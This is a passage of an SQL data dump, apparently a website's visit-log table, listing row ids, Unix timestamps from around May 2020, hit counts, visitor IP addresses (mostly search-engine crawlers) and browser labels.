8421672,1,1,0,0,'46.219.222.37','firefox'),(502214,1588421786,1,1,0,0,'178.154.200.222','other'),(502215,1588421879,1,1,0,0,'213.180.203.16','other'),(502216,1588422072,1,1,0,0,'131.220.6.152','chrome'),(502217,1588422361,8,8,0,0,'77.120.98.235','other'),(502218,1588422544,1,1,0,0,'207.46.13.76','other'),(502219,1588422675,1,1,0,0,'66.249.70.70','chrome'),(502220,1588423113,1,1,0,0,'66.249.70.72','chrome'),(502221,1588423833,1,0,1,0,'66.249.70.70',''),(502222,1588423835,2,2,0,0,'66.249.70.69','chrome'),(502223,1588424228,1,1,0,0,'178.154.200.222','other'),(502224,1588425002,1,1,0,0,'66.249.70.69','chrome'),(502225,1588425026,1,1,0,0,'213.180.203.16','other'),(502226,1588425429,1,1,0,0,'66.249.70.70','chrome'),(502227,1588425619,1,1,0,0,'207.46.13.76','other'),(502228,1588426207,2,2,0,0,'66.249.70.72','chrome'),(502229,1588426287,1,1,0,0,'8.29.198.27','other'),(502230,1588426396,2,2,0,0,'66.249.70.70','chrome'),(502231,1588426727,1,1,0,0,'8.29.198.25','other'),(502232,1588426804,1,1,0,0,'88.155.83.64','chrome'),(502233,1588426842,1,1,0,0,'178.154.200.112','other'),(502234,1588426913,2,2,0,0,'157.55.39.194','other'),(502235,1588427488,1,1,0,0,'66.249.64.36','chrome'),(502236,1588427770,1,1,0,0,'207.46.13.76','other'),(502237,1588427829,1,1,0,0,'66.249.70.70','chrome'),(502238,1588428251,2,2,0,0,'213.180.203.16','other'),(502239,1588428359,1,1,0,0,'178.154.200.222','other'),(502240,1588429330,2,2,0,0,'157.55.39.194','other'),(502241,1588429856,3,3,0,0,'178.154.200.222','other'),(502242,1588430179,8,8,0,0,'77.120.98.235','other'),(502243,1588430402,1,1,0,0,'66.249.70.72','chrome'),(502244,1588431003,1,1,0,0,'178.154.200.222','other'),(502245,1588431366,1,1,0,0,'157.55.39.167','other'),(502246,1588431532,1,1,0,0,'66.249.70.69','chrome'),(502247,1588431560,1,1,0,0,'213.180.203.109','other'),(502248,1588431683,1,1,0,0,'66.249.70.72','chrome'),(502249,1588432280,1,1,0,0,'178.154.200.220','other'),(502250,1588432382,1,1,0,0,'66.249.70.70','chrome'),(502251,1588432541,1,1,0,0,'157.55.39.167','other'),(502252,1588433063,1,1,0,0,'178.154.200.222','other'),(502253,1588433534,2,2,0,0,'157.55.39.194','other'),(502254,1588434445,1,1,0,0,'178.154.200.236','other'),(502255,1588434525,2,2,0,0,'178.154.200.222','other'),(502256,1588435509,1,1,0,0,'178.154.200.97','other'),(502257,1588436514,1,1,0,0,'157.55.39.194','other'),(502258,1588436816,1,1,0,0,'178.154.200.222','other'),(502259,1588437077,2,2,0,0,'213.180.203.16','other'),(502260,1588437116,2,2,0,0,'8.29.198.27','other'),(502261,1588437713,1,1,0,0,'66.249.64.38','chrome'),(502262,1588438044,2,2,0,0,'178.154.200.222','other'),(502263,1588438164,8,8,0,0,'77.120.98.235','other'),(502264,1588438681,1,1,0,0,'66.249.70.70','chrome'),(502265,1588440488,1,1,0,0,'66.249.70.69','chrome'),(502266,1588440499,3,3,0,0,'178.154.200.222','other'),(502267,1588441248,1,1,0,0,'213.180.203.16','other'),(502268,1588441540,3,3,0,0,'178.154.200.222','other'),(502269,1588441715,1,1,0,0,'178.154.200.112','other'),(502270,1588442002,1,1,0,0,'66.249.70.69','chrome'),(502271,1588442507,1,1,0,0,'213.180.203.16','other'),(502272,1588442734,1,1,0,0,'157.55.39.194','other'),(502273,1588443467,1,1,0,0,'213.180.203.16','other'),(502274,1588445088,1,1,0,0,'178.154.200.220','other'),(502275,1588445829,8,8,0,0,'77.120.98.235','other'),(502276,1588446186,1,1,0,0,'178.154.200.97','other'),(502277,1588447273,7,7,0,0,'46.4.107.106','other'),(502278,1588447505,2,2,0,0,'66.249.70.70','chrome'),(502279,1588447938,1,1,0,0,'157.55.39.194','other'),(502280,1588447941,2,2,0,0,'8.29.198.25','other'),(502281,1588448192,5,5,0,0,'46.4.107.106','other'),(502282,1588448563,1,1,0,0,'66.249.70.69','chrome'),(502283,1588448619,1,1,0,0,'66.249.70.70','chrome'),(502284,1588448938,1,1,0,0,'154.51.131.142','chrome'),(502285,1588449105,2,2,0,0,'213.180.203.16','other'),(502286,1588449649,1,1,0,0,'66.249.70.70','chrome'),(502287,1588450692,1,1,0,0,'66.249.70.69','chrome'),(502288,1588450894,1,1,0,0,'13.66.139.0','other'),(502289,1588451769,1,1,0,0,'66.249.70.72','chrome'),(502290,1588451899,1,1,0,0,'213.180.203.16','other'),(502291,1588453339,1,1,0,0,'66.249.70.72','chrome'),(502292,1588453951,8,8,0,0,'77.120.98.235','other'),(502293,1588454077,1,1,0,0,'138.246.253.15','chrome'),(502294,1588454512,1,1,0,0,'104.248.124.93','msie'),(502295,1588454570,1,1,0,0,'66.249.70.69','chrome'),(502296,1588455212,1,1,0,0,'178.154.200.19','other'),(502297,1588455244,1,1,0,0,'178.154.200.222','other'),(502298,1588455488,1,1,0,0,'66.249.70.70','chrome'),(502299,1588456116,1,1,0,0,'66.249.64.33','chrome'),(502300,1588456570,1,1,0,0,'157.55.39.164','other'),(502301,1588456580,1,1,0,0,'66.249.70.69','chrome'),(502302,1588456901,1,1,0,0,'89.169.133.9','chrome'),(502303,1588456913,1,1,0,0,'176.52.35.55','chrome'),(502304,1588457010,1,1,0,0,'178.154.200.222','other'),(502305,1588457184,1,1,0,0,'66.249.70.72','chrome'),(502306,1588458768,1,1,0,0,'8.29.198.26','other'),(502307,1588459040,2,2,0,0,'66.249.70.72','chrome'),(502308,1588459114,1,1,0,0,'178.154.200.222','other'),(502309,1588459205,1,1,0,0,'8.29.198.25','other'),(502310,1588460095,1,1,0,0,'66.249.70.69','chrome'),(502311,1588460623,1,1,0,0,'66.249.70.70','chrome'),(502312,1588461062,1,1,0,0,'66.249.70.69','chrome'),(502313,1588461179,2,2,0,0,'178.154.200.222','other'),(502314,1588461843,1,1,0,0,'39.98.124.123','firefox'),(502315,1588462306,1,1,0,0,'66.249.64.36','chrome'),(502316,1588462544,8,8,0,0,'77.120.98.235','other'),(502317,1588462670,1,1,0,0,'66.249.64.33','chrome'),(502318,1588463362,1,1,0,0,'13.59.91.96','chrome'),(502319,1588463378,1,1,0,0,'66.249.70.72','chrome'),(502320,1588463574,1,1,0,0,'13.66.139.0','other'),(502321,1588463769,1,1,0,0,'62.205.134.182','other'),(502322,1588463930,1,1,0,0,'66.249.70.69','chrome'),(502323,1588464946,1,1,0,0,'213.180.203.16','other'),(502324,1588465248,1,1,0,0,'157.55.39.164','other'),(502325,1588466110,1,1,0,0,'66.249.70.72','chrome'),(502326,1588467377,2,2,0,0,'178.154.200.222','other'),(502327,1588467509,1,1,0,0,'213.180.203.16','other'),(502328,1588467630,1,1,0,0,'157.55.39.205','other'),(502329,1588468343,1,1,0,0,'213.180.203.17','other'),(502330,1588469521,1,1,0,0,'66.249.70.72','chrome'),(502331,1588469596,1,1,0,0,'8.29.198.27','other'),(502332,1588469604,1,1,0,0,'178.154.200.196','other'),(502333,1588469988,1,1,0,0,'173.252.111.18','other'),(502334,1588469989,1,1,0,0,'173.252.111.13','other'),(502335,1588470034,1,1,0,0,'8.29.198.26','other'),(502336,1588470534,8,8,0,0,'77.120.98.235','other'),(502337,1588472299,1,1,0,0,'66.249.70.69','chrome'),(502338,1588472361,2,2,0,0,'178.154.200.222','other'),(502339,1588472667,2,2,0,0,'213.180.203.16','other'),(502340,1588472926,1,1,0,0,'157.55.39.164','other'),(502341,1588473890,1,1,0,0,'213.180.203.16','other'),(502342,1588474836,1,1,0,0,'66.249.64.38','chrome'),(502343,1588475225,1,1,0,0,'66.249.70.69','chrome'),(502344,1588476148,2,2,0,0,'157.55.39.164','other'),(502345,1588476904,3,3,0,0,'35.226.58.239','chrome'),(502346,1588477784,1,1,0,0,'213.180.203.140','other'),(502347,1588478153,1,1,0,0,'66.249.70.69','chrome'),(502348,1588478167,1,0,1,0,'66.249.70.72',''),(502349,1588479231,8,8,0,0,'77.120.98.235','other'),(502350,1588480420,2,2,0,0,'8.29.198.26','other'),(502351,1588481297,1,1,0,0,'62.205.134.182','other'),(502352,1588481327,1,1,0,0,'157.55.39.164','other'),(502353,1588482845,1,1,0,0,'178.154.200.222','other'),(502354,1588484153,1,1,0,0,'213.80.197.240','chrome'),(502355,1588484188,3,3,0,0,'192.151.157.210','other'),(502356,1588484306,1,1,0,0,'178.154.200.222','other'),(502357,1588486136,1,1,0,0,'66.249.70.72','chrome'),(502358,1588486221,1,1,0,0,'66.249.70.70','chrome'),(502359,1588486567,3,3,0,0,'77.120.98.235','other'),(502360,1588486809,1,1,0,0,'157.55.39.205','other'),(502361,1588487514,1,1,0,0,'157.55.39.164','other'),(502362,1588488557,1,1,0,0,'66.249.70.70','chrome'),(502363,1588490475,3,3,0,0,'157.55.39.205','other'),(502364,1588490613,1,1,0,0,'157.55.39.164','other'),(502365,1588491245,1,1,0,0,'8.29.198.25','other'),(502366,1588491681,1,1,0,0,'8.29.198.27','other'),(502367,1588491759,1,1,0,0,'66.249.70.72','chrome'),(502368,1588492002,1,1,0,0,'88.155.25.172','chrome'),(502369,1588492448,2,2,0,0,'66.249.70.69','chrome'),(502370,1588492728,1,1,0,0,'157.55.39.205','other'),(502371,1588494511,8,8,0,0,'77.120.98.235','other'),(502372,1588494632,1,1,0,0,'66.249.70.70','chrome'),(502373,1588494947,1,1,0,0,'66.249.70.69','chrome'),(502374,1588494958,1,1,0,0,'66.249.64.36','chrome'),(502375,1588496183,2,2,0,0,'66.249.70.69','chrome'),(502376,1588496396,2,2,0,0,'66.249.70.70','chrome'),(502377,1588497666,1,1,0,0,'66.249.64.38','chrome'),(502378,1588498373,1,1,0,0,'66.249.70.72','chrome'),(502379,1588499028,1,1,0,0,'157.55.39.205','other'),(502380,1588499698,1,1,0,0,'66.249.70.69','chrome'),(502381,1588499968,1,1,0,0,'66.249.70.70','chrome'),(502382,1588501158,2,2,0,0,'157.55.39.205','other'),(502383,1588501248,1,1,0,0,'66.249.70.70','chrome'),(502384,1588501405,1,1,0,0,'157.55.39.164','other'),(502385,1588502070,1,1,0,0,'8.29.198.26','other'),(502386,1588502483,8,8,0,0,'77.120.98.235','other'),(502387,1588502495,1,1,0,0,'66.249.70.72','chrome'),(502388,1588502507,1,1,0,0,'8.29.198.25','other'),(502389,1588503160,1,1,0,0,'18.184.195.200','chrome'),(502390,1588503349,1,1,0,0,'66.249.70.69','chrome'),(502391,1588504092,1,1,0,0,'93.73.160.193','firefox'),(502392,1588505127,1,1,0,0,'91.196.178.25','chrome'),(502393,1588505449,1,1,0,0,'66.249.70.69','chrome'),(502394,1588505570,1,1,0,0,'173.252.111.15','other'),(502395,1588505571,1,1,0,0,'173.252.111.1','other'),(502396,1588506072,4,4,0,0,'157.55.39.164','other'),(502397,1588506096,2,2,0,0,'157.55.39.205','other'),(502398,1588508185,1,1,0,0,'109.74.154.72','chrome'),(502399,1588508796,1,1,0,0,'131.220.6.152','chrome'),(502400,1588509180,2,2,0,0,'66.249.70.72','chrome'),(502401,1588509921,8,8,0,0,'77.120.98.235','other'),(502402,1588510492,2,2,0,0,'66.249.64.33','chrome'),(502403,1588510504,1,1,0,0,'66.249.64.38','chrome'),(502404,1588510614,1,1,0,0,'157.55.39.205','other'),(502405,1588511087,1,1,0,0,'178.154.200.220','other'),(502406,1588511998,2,2,0,0,'66.249.70.72','chrome'),(502407,1588512700,1,1,0,0,'207.46.13.68','other'),(502408,1588512897,1,1,0,0,'8.29.198.26','other'),(502409,1588513339,1,1,0,0,'8.29.198.27','other'),(502410,1588514694,1,1,0,0,'66.249.70.70','chrome'),(502411,1588514786,1,1,0,0,'178.154.200.222','other'),(502412,1588515316,1,1,0,0,'66.249.70.69','chrome'),(502413,1588515995,1,1,0,0,'178.154.200.236','other'),(502414,1588516312,1,1,0,0,'66.249.70.72','chrome'),(502415,1588516543,1,1,0,0,'207.46.13.68','other'),(502416,1588516908,8,8,0,0,'77.120.98.235','other'),(502417,1588517182,1,1,0,0,'157.55.39.205','other'),(502418,1588517591,2,2,0,0,'66.249.64.36','chrome'),(502419,1588518175,1,1,0,0,'66.249.70.69','chrome'),(502420,1588518518,1,1,0,0,'192.162.114.234','chrome'),(502421,1588519030,1,1,0,0,'130.180.217.104','chrome'),(502422,1588519220,1,1,0,0,'66.249.70.69','chrome'),(502423,1588519377,1,1,0,0,'66.249.64.38','chrome'),(502424,1588519459,1,1,0,0,'157.55.39.164','other'),(502425,1588520533,1,1,0,0,'66.249.70.70','chrome'),(502426,1588520847,2,2,0,0,'207.46.13.68','other'),(502427,1588520959,1,1,0,0,'95.134.97.225','firefox'),(502428,1588521043,3,3,0,0,'157.55.39.205','other'),(502429,1588521528,2,2,0,0,'66.249.70.72','chrome'),(502430,1588521533,1,1,0,0,'66.249.64.38','chrome'),(502431,1588521535,1,1,0,0,'66.249.70.70','chrome'),(502432,1588522101,2,2,0,0,'157.55.39.164','other'),(502433,1588522609,1,1,0,0,'207.46.13.68','other'),(502434,1588523096,1,1,0,0,'66.249.70.72','chrome'),(502435,1588523130,8,8,0,0,'77.120.98.235','other'),(502436,1588523237,1,1,0,0,'66.249.70.69','chrome'),(502437,1588523657,1,1,0,0,'207.46.13.68','other'),(502438,1588523659,1,1,0,0,'66.249.70.70','chrome'),(502439,1588523723,2,2,0,0,'8.29.198.27','other'),(502440,1588524292,1,1,0,0,'157.55.39.164','other'),(502441,1588524588,1,1,0,0,'178.154.200.216','other'),(502442,1588524666,2,2,0,0,'157.55.39.205','other'),(502443,1588524817,1,1,0,0,'66.249.70.69','chrome'),(502444,1588524840,1,1,0,0,'178.154.200.67','other'),(502445,1588525369,1,1,0,0,'157.55.39.164','other'),(502446,1588526649,1,1,0,0,'213.180.203.50','other'),(502447,1588526669,1,1,0,0,'178.154.200.220','other'),(502448,1588526794,1,1,0,0,'66.249.64.33','chrome'),(502449,1588526816,1,1,0,0,'157.55.39.205','other'),(502450,1588526906,2,2,0,0,'66.249.70.72','chrome'),(502451,1588527589,2,2,0,0,'173.252.111.1','other'),(502452,1588527590,2,2,0,0,'173.252.111.20','other'),(502453,1588527598,1,1,0,0,'173.252.111.3','other'),(502454,1588527604,1,1,0,0,'178.154.200.17','other'),(502455,1588527706,3,3,0,0,'207.46.13.68','other'),(502456,1588527771,1,1,0,0,'157.55.39.132','other'),(502457,1588528018,2,2,0,0,'66.249.70.69','chrome'),(502458,1588528019,1,1,0,0,'66.249.64.33','chrome'),(502459,1588528581,1,1,0,0,'66.249.70.70','chrome'),(502460,1588529287,1,1,0,0,'66.249.64.38','chrome'),(502461,1588529449,1,1,0,0,'213.180.203.50','other'),(502462,1588529724,2,2,0,0,'66.249.70.69','chrome'),(502463,1588529879,1,1,0,0,'95.132.55.30','chrome'),(502464,1588530510,2,2,0,0,'157.55.39.132','other'),(502465,1588530584,1,1,0,0,'178.154.200.196','other'),(502466,1588530603,1,1,0,0,'66.249.70.70','chrome'),(502467,1588531139,8,8,0,0,'77.120.98.235','other'),(502468,1588531566,1,1,0,0,'178.154.200.67','other'),(502469,1588532666,1,1,0,0,'45.77.134.191','other'),(502470,1588532721,1,1,0,0,'178.154.200.175','other'),(502471,1588533068,1,1,0,0,'178.154.200.220','other'),(502472,1588533113,1,1,0,0,'207.46.13.149','other'),(502473,1588533319,1,1,0,0,'157.55.39.132','other'),(502474,1588533330,1,1,0,0,'66.249.64.36','chrome'),(502475,1588533633,1,1,0,0,'66.249.64.38','chrome'),(502476,1588534102,1,1,0,0,'178.154.200.110','other'),(502477,1588534507,1,1,0,0,'66.249.70.70','chrome'),(502478,1588534554,1,1,0,0,'8.29.198.27','other'),(502479,1588534765,1,1,0,0,'66.249.64.38','chrome'),(502480,1588534992,1,1,0,0,'8.29.198.26','other'),(502481,1588535637,1,1,0,0,'91.196.178.54','chrome'),(502482,1588535661,1,1,0,0,'37.173.10.35','chrome'),(502483,1588536199,1,1,0,0,'157.55.39.132','other'),(502484,1588536678,1,1,0,0,'178.154.200.196','other'),(502485,1588537001,1,1,0,0,'207.46.13.149','other'),(502486,1588537203,1,1,0,0,'178.154.200.47','other'),(502487,1588537227,1,1,0,0,'178.154.200.112','other'),(502488,1588537234,1,1,0,0,'66.249.64.33','chrome'),(502489,1588537335,1,1,0,0,'66.249.70.69','chrome'),(502490,1588537733,1,1,0,0,'178.154.200.220','other'),(502491,1588537822,1,1,0,0,'178.154.200.59','other'),(502492,1588538356,1,1,0,0,'178.154.200.236','other'),(502493,1588538712,8,8,0,0,'77.120.98.235','other'),(502494,1588539694,1,1,0,0,'66.249.70.70','chrome'),(502495,1588540626,1,1,0,0,'213.180.203.140','other'),(502496,1588541083,1,1,0,0,'207.46.13.149','other'),(502497,1588541734,1,1,0,0,'213.180.203.101','other'),(502498,1588542575,1,1,0,0,'91.196.178.54','chrome'),(502499,1588543019,1,1,0,0,'66.249.64.36','chrome'),(502500,1588543383,1,1,0,0,'66.249.70.69','chrome'),(502501,1588543398,1,1,0,0,'207.46.13.149','other'),(502502,1588544300,1,1,0,0,'66.249.70.69','chrome'),(502503,1588544890,1,1,0,0,'178.154.200.219','other'),(502504,1588545221,1,1,0,0,'66.249.70.69','chrome'),(502505,1588545308,2,2,0,0,'157.55.39.205','other'),(502506,1588545377,1,1,0,0,'8.29.198.25','other'),(502507,1588545749,1,1,0,0,'178.154.200.91','other'),(502508,1588545819,1,1,0,0,'8.29.198.26','other'),(502509,1588545861,1,1,0,0,'178.154.200.22','other'),(502510,1588546039,1,1,0,0,'213.180.203.142','other'),(502511,1588546290,2,2,0,0,'207.46.13.149','other'),(502512,1588546545,8,8,0,0,'77.120.98.235','other'),(502513,1588546576,1,1,0,0,'213.180.203.155','other'),(502514,1588546614,1,1,0,0,'66.249.70.69','chrome'),(502515,1588546669,2,2,0,0,'157.55.39.132','other'),(502516,1588546749,1,1,0,0,'66.249.64.36','chrome'),(502517,1588547537,1,1,0,0,'178.154.200.236','other'),(502518,1588548220,1,1,0,0,'66.249.70.69','chrome'),(502519,1588548276,2,2,0,0,'66.249.70.70','chrome'),(502520,1588548321,1,1,0,0,'66.249.64.38','chrome'),(502521,1588548471,1,1,0,0,'178.154.200.236','other'),(502522,1588548568,1,1,0,0,'66.249.70.72','chrome'),(502523,1588548862,1,1,0,0,'207.46.13.149','other'),(502524,1588549647,1,1,0,0,'17.58.101.26','other'),(502525,1588550106,1,1,0,0,'62.205.134.182','other'),(502526,1588551251,1,1,0,0,'157.55.39.132','other'),(502527,1588551276,1,1,0,0,'66.249.70.69','chrome'),(502528,1588551283,1,1,0,0,'178.154.200.17','other'),(502529,1588551600,1,1,0,0,'178.154.200.114','other'),(502530,1588551617,1,1,0,0,'178.154.200.97','other'),(502531,1588552092,1,1,0,0,'178.154.200.196','other'),(502532,1588552699,1,1,0,0,'178.154.200.216','other'),(502533,1588552701,1,1,0,0,'213.180.203.90','other'),(502534,1588552713,1,1,0,0,'142.93.186.172','msie'),(502535,1588553016,1,1,0,0,'66.249.70.70','chrome'),(502536,1588553102,1,1,0,0,'178.154.200.246','other'),(502537,1588553309,1,1,0,0,'207.46.13.149','other'),(502538,1588554209,8,8,0,0,'77.120.98.235','other'),(502539,1588554432,1,1,0,0,'66.249.70.70','chrome'),(502540,1588554689,1,1,0,0,'178.154.200.114','other'),(502541,1588555092,1,1,0,0,'213.180.203.173','other'),(502542,1588555290,1,1,0,0,'157.55.39.132','other'),(502543,1588555731,1,1,0,0,'178.154.200.100','other'),(502544,1588556116,1,1,0,0,'66.249.70.70','chrome'),(502545,1588556200,1,1,0,0,'8.29.198.26','other'),(502546,1588556646,1,1,0,0,'8.29.198.27','other'),(502547,1588558422,1,1,0,0,'178.154.200.175','other'),(502548,1588558543,1,1,0,0,'157.55.39.132','other'),(502549,1588558599,1,1,0,0,'66.249.70.72','chrome'),(502550,1588558711,1,1,0,0,'178.154.200.22','other'),(502551,1588559463,1,1,0,0,'66.249.70.70','chrome'),(502552,1588559498,1,1,0,0,'178.154.200.112','other'),(502553,1588561539,8,8,0,0,'77.120.98.235','other'),(502554,1588561766,2,2,0,0,'66.249.70.70','chrome'),(502555,1588562063,2,2,0,0,'213.180.203.81','other'),(502556,1588562452,1,1,0,0,'66.249.70.72','chrome'),(502557,1588562596,1,1,0,0,'213.180.203.38','other'),(502558,1588562626,1,1,0,0,'178.154.200.185','other'),(502559,1588563325,1,1,0,0,'178.154.200.17','other'),(502560,1588563688,1,1,0,0,'213.180.203.190','other'),(502561,1588563913,1,1,0,0,'178.154.200.47','other'),(502562,1588564384,1,1,0,0,'66.249.64.38','chrome'),(502563,1588565428,1,1,0,0,'178.154.200.22','other'),(502564,1588565906,1,1,0,0,'213.180.203.101','other'),(502565,1588565908,1,1,0,0,'178.154.200.245','other'),(502566,1588567019,1,1,0,0,'8.29.198.26','other'),(502567,1588567288,1,1,0,0,'178.154.200.22','other'),(502568,1588567473,1,1,0,0,'8.29.198.27','other'),(502569,1588567542,1,1,0,0,'62.205.134.182','other'),(502570,1588567892,1,1,0,0,'178.154.200.222','other'),(502571,1588568059,1,1,0,0,'157.55.39.132','other'),(502572,1588568129,1,1,0,0,'178.154.200.246','other'),(502573,1588568138,1,1,0,0,'213.180.203.140','other'),(502574,1588568681,1,1,0,0,'178.154.200.196','other'),(502575,1588569069,8,8,0,0,'77.120.98.235','other'),(502576,1588569562,1,1,0,0,'178.154.200.100','other'),(502577,1588570101,1,0,1,0,'66.249.70.69',''),(502578,1588570669,1,1,0,0,'91.196.179.33','chrome'),(502579,1588572045,1,1,0,0,'178.154.200.236','other'),(502580,1588572566,1,1,0,0,'157.55.39.205','other'),(502581,1588572665,1,1,0,0,'213.180.203.142','other'),(502582,1588573119,1,1,0,0,'178.154.200.87','other'),(502583,1588573285,1,1,0,0,'91.196.178.72','chrome'),(502584,1588574050,1,1,0,0,'178.95.159.205','chrome'),(502585,1588574976,1,1,0,0,'178.154.200.220','other'),(502586,1588575485,1,1,0,0,'92.112.176.94','chrome'),(502587,1588575807,1,1,0,0,'66.249.70.70','chrome'),(502588,1588576138,1,1,0,0,'157.55.39.205','other'),(502589,1588576425,1,1,0,0,'178.154.200.196','other'),(502590,1588576594,8,8,0,0,'77.120.98.235','other'),(502591,1588577136,2,2,0,0,'157.55.39.205','other'),(502592,1588577141,1,1,0,0,'157.55.39.132','other'),(502593,1588577660,1,1,0,0,'66.249.70.70','chrome'),(502594,1588577847,1,1,0,0,'8.29.198.25','other'),(502595,1588578039,3,3,0,0,'91.209.11.236','other'),(502596,1588578311,1,1,0,0,'8.29.198.26','other'),(502597,1588578418,1,1,0,0,'66.249.70.69','chrome'),(502598,1588578463,1,1,0,0,'178.154.200.119','other'),(502599,1588579324,1,1,0,0,'178.95.159.205','chrome'),(502600,1588580222,1,1,0,0,'66.249.70.69','chrome'),(502601,1588580232,1,1,0,0,'66.249.70.70','chrome'),(502602,1588580725,1,1,0,0,'185.151.106.157','chrome'),(502603,1588580868,1,1,0,0,'213.180.203.155','other'),(502604,1588581453,1,1,0,0,'157.55.39.132','other'),(502605,1588581462,1,1,0,0,'213.180.203.38','other'),(502606,1588582086,2,2,0,0,'66.249.70.70','chrome'),(502607,1588583085,1,1,0,0,'66.249.70.69','chrome'),(502608,1588583367,1,1,0,0,'178.95.159.205','chrome'),(502609,1588583442,1,1,0,0,'213.180.203.146','other'),(502610,1588583672,1,1,0,0,'157.55.39.132','other'),(502611,1588583856,2,2,0,0,'91.209.11.236','other'),(502612,1588583906,2,2,0,0,'66.249.70.72','chrome'),(502613,1588584291,8,8,0,0,'77.120.98.235','other'),(502614,1588584377,1,1,0,0,'66.249.64.38','chrome'),(502615,1588584506,1,1,0,0,'178.95.159.205','chrome'),(502616,1588584533,1,1,0,0,'195.88.159.108','chrome'),(502617,1588584585,2,2,0,0,'95.158.51.67','other'),(502618,1588584591,1,1,0,0,'178.154.200.110','other'),(502619,1588584621,1,1,0,0,'178.154.200.220','other'),(502620,1588585176,2,2,0,0,'91.209.11.236','other'),(502621,1588585916,1,1,0,0,'66.249.70.72','chrome'),(502622,1588586112,2,2,0,0,'91.209.11.236','other'),(502623,1588586631,1,1,0,0,'3.14.244.104','chrome'),(502624,1588587091,1,1,0,0,'66.249.70.69','chrome'),(502625,1588587174,1,1,0,0,'66.249.70.70','chrome'),(502626,1588588123,1,1,0,0,'178.154.200.220','other'),(502627,1588588672,2,2,0,0,'8.29.198.27','other'),(502628,1588588915,1,1,0,0,'66.249.64.36','chrome'),(502629,1588589073,2,2,0,0,'66.249.70.72','chrome'),(502630,1588589197,1,1,0,0,'66.249.70.70','chrome'),(502631,1588589283,1,1,0,0,'195.64.183.2','chrome'),(502632,1588589634,1,1,0,0,'91.196.178.185','chrome'),(502633,1588590041,1,1,0,0,'178.154.200.222','other'),(502634,1588590565,2,2,0,0,'157.55.39.132','other'),(502635,1588590749,1,1,0,0,'13.66.139.0','other'),(502636,1588591335,1,1,0,0,'178.154.200.222','other'),(502637,1588591715,2,2,0,0,'157.55.39.205','other'),(502638,1588591905,1,1,0,0,'109.74.154.72','chrome'),(502639,1588591991,8,8,0,0,'77.120.98.235','other'),(502640,1588592132,4,4,0,0,'157.55.39.132','other'),(502641,1588592465,2,2,0,0,'66.249.70.70','chrome'),(502642,1588592471,1,1,0,0,'91.196.177.15','chrome'),(502643,1588593609,1,1,0,0,'178.95.159.205','chrome'),(502644,1588593689,1,1,0,0,'66.249.70.72','chrome'),(502645,1588594250,1,1,0,0,'157.55.39.132','other'),(502646,1588594435,2,2,0,0,'91.209.11.236','other'),(502647,1588594642,1,1,0,0,'91.196.178.25','chrome'),(502648,1588594713,1,1,0,0,'213.180.203.77','other'),(502649,1588594790,1,1,0,0,'131.220.6.152','chrome'),(502650,1588595478,1,1,0,0,'91.124.118.81','chrome'),(502651,1588595586,1,1,0,0,'91.209.11.236','other'),(502652,1588595755,1,1,0,0,'66.249.70.72','chrome'),(502653,1588595935,1,0,1,0,'66.249.70.69',''),(502654,1588595970,1,1,0,0,'213.180.203.155','other'),(502655,1588596008,1,1,0,0,'178.154.200.155','other'),(502656,1588596471,1,1,0,0,'91.196.178.25','chrome'),(502657,1588596701,1,1,0,0,'176.105.196.118','chrome'),(502658,1588596924,1,1,0,0,'66.249.70.70','chrome'),(502659,1588597066,1,1,0,0,'91.196.178.69','firefox'),(502660,1588597310,1,1,0,0,'91.196.178.88','chrome'),(502661,1588597655,1,1,0,0,'176.105.196.118','chrome'),(502662,1588597901,1,1,0,0,'31.13.127.50','other'),(502663,1588597902,1,1,0,0,'31.13.127.10','other'),(502666,1588597909,1,1,0,0,'157.55.39.132','other'),(502667,1588598059,1,1,0,0,'91.196.178.76','chrome'),(502668,1588598184,1,1,0,0,'178.95.159.205','chrome'),(502669,1588598231,2,2,0,0,'185.151.106.157','chrome'),(502670,1588598411,1,1,0,0,'157.55.39.205','other'),(502671,1588599504,2,2,0,0,'8.29.198.27','other'),(502672,1588599547,8,8,0,0,'77.120.98.235','other'),(502673,1588600078,1,1,0,0,'92.112.124.184','firefox'),(502674,1588600148,2,2,0,0,'66.249.70.72','chrome'),(502675,1588600159,3,3,0,0,'66.249.70.69','chrome'),(502676,1588600307,1,1,0,0,'66.249.70.70','chrome'),(502677,1588600653,1,1,0,0,'66.249.64.38','chrome'),(502678,1588601069,1,1,0,0,'66.249.70.72','chrome'),(502679,1588601134,1,1,0,0,'178.95.159.205','chrome'),(502680,1588602594,1,1,0,0,'157.55.39.132','other'),(502681,1588603626,1,1,0,0,'37.55.226.249','chrome'),(502682,1588603654,2,2,0,0,'91.209.11.236','other'),(502683,1588603821,1,1,0,0,'66.249.70.70','chrome'),(502684,1588604140,2,2,0,0,'157.55.39.205','other'),(502685,1588604611,2,2,0,0,'91.209.11.236','other'),(502686,1588605371,3,3,0,0,'66.249.70.69','chrome'),(502687,1588605734,1,1,0,0,'31.13.127.22','other'),(502688,1588605735,1,1,0,0,'31.13.127.6','other'),(502691,1588605872,1,1,0,0,'157.55.39.205','other'),(502692,1588606572,2,2,0,0,'66.249.70.70','chrome'),(502693,1588606685,1,1,0,0,'66.249.70.72','chrome'),(502694,1588606932,1,1,0,0,'66.249.64.36','chrome'),(502695,1588608033,1,1,0,0,'66.249.70.72','chrome'),(502696,1588608124,1,1,0,0,'130.180.219.42','chrome'),(502697,1588608179,2,2,0,0,'66.249.70.70','chrome'),(502698,1588608938,3,3,0,0,'18.188.136.39','chrome'),(502699,1588608993,8,8,0,0,'77.120.98.235','other'),(502700,1588609333,1,1,0,0,'157.55.39.205','other'),(502701,1588609470,1,0,1,0,'66.249.70.70',''),(502702,1588610330,1,1,0,0,'8.29.198.26','other'),(502703,1588610789,1,1,0,0,'8.29.198.27','other'),(502704,1588611192,1,1,0,0,'157.55.39.205','other'),(502705,1588612325,1,1,0,0,'94.130.9.183','other'),(502706,1588612517,1,1,0,0,'31.13.103.7','other'),(502707,1588612518,1,1,0,0,'31.13.103.14','other'),(502708,1588613301,1,1,0,0,'66.249.64.33','chrome'),(502709,1588614098,1,1,0,0,'66.249.70.70','chrome'),(502710,1588614490,1,1,0,0,'157.55.39.205','other'),(502711,1588615502,1,1,0,0,'66.249.70.72','chrome'),(502712,1588615565,1,1,0,0,'79.137.130.101','chrome'),(502713,1588615714,1,1,0,0,'173.252.111.7','other'),(502714,1588615717,1,1,0,0,'173.252.111.20','other'),(502715,1588616239,1,1,0,0,'88.155.200.193','chrome'),(502716,1588617040,2,2,0,0,'213.180.203.16','other'),(502717,1588617247,8,8,0,0,'77.120.98.235','other'),(502718,1588617468,1,1,0,0,'66.249.70.72','chrome'),(502719,1588618648,1,1,0,0,'66.249.70.72','chrome'),(502720,15886200